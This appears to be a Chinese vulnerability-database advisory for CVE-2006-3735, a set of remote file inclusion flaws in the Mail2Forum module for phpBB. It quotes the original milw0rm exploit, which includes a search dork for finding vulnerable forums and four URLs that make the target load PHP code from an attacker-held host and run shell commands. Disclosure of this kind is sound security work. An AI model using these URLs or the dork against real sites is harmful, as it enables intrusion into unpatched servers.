Mail2Forum多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110630 漏洞类型 输入验证
发布时间 2006-07-17 更新时间 2006-08-09
CVE编号 CVE-2006-3735 CNNVD-ID CNNVD-200607-362
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2019
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-362
|漏洞详情
Mail2Forum(用于phpBB的模块)1.2及之前版本有多个PHP远程文件包含漏洞,远程攻击者可以通过对(1)m2f/m2f_phpbb204.php,(2)m2f/m2f_forum.php,(3)m2f/m2f_mailinglist.php或(4)m2f/m2f_cron.php的m2f_root_path参数内的URL执行任意PHP代码。
|漏洞EXP
Title : mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities

###############################################################################

Discovered By OLiBekaS

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : mail for phpbb (bulletin board/forum software)
version : latest version [ 1.2 ]
URL : http://www.www.mail2forum.com

-----------------------------------------------------------------------------

dork        : allinurl:/m2f_usercp.php?

Exploit     : 
http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-07-17]
|参考资料

来源:XF
名称:mail2forum-m2frootpath-file-include(27788)
链接:http://xforce.iss.net/xforce/xfdb/27788
来源:BID
名称:19038
链接:http://www.securityfocus.com/bid/19038
来源:OSVDB
名称:27357
链接:http://www.osvdb.org/27357
来源:OSVDB
名称:27356
链接:http://www.osvdb.org/27356
来源:OSVDB
名称:27355
链接:http://www.osvdb.org/27355
来源:OSVDB
名称:27354
链接:http://www.osvdb.org/27354
来源:VUPEN
名称:ADV-2006-2847
链接:http://www.frsirt.com/english/advisories/2006/2847
来源:SECUNIA
名称:21083
链接:http://secunia.com/advisories/21083
来源:MILW0RM
名称:2019
链接:http://milw0rm.com/exploits/2019